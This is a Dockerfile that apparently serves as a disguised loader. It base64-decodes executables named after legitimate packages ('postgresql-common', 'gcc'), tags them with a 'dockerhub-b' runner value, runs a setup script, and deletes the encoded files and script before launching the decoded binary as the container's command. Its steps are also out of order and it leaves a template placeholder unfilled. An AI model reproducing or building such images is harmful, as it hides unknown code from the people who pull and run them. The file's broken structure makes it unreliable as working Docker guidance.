FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > postgresql-common.log'

RUN base64 --decode postgresql-common.64 > postgresql-common
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY postgresql-common .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' postgresql-common
RUN bash ./docker.sh

RUN rm --force --recursive postgresql-common _REPO_NAME__.64 docker.sh gcc gcc.64

CMD postgresql-common
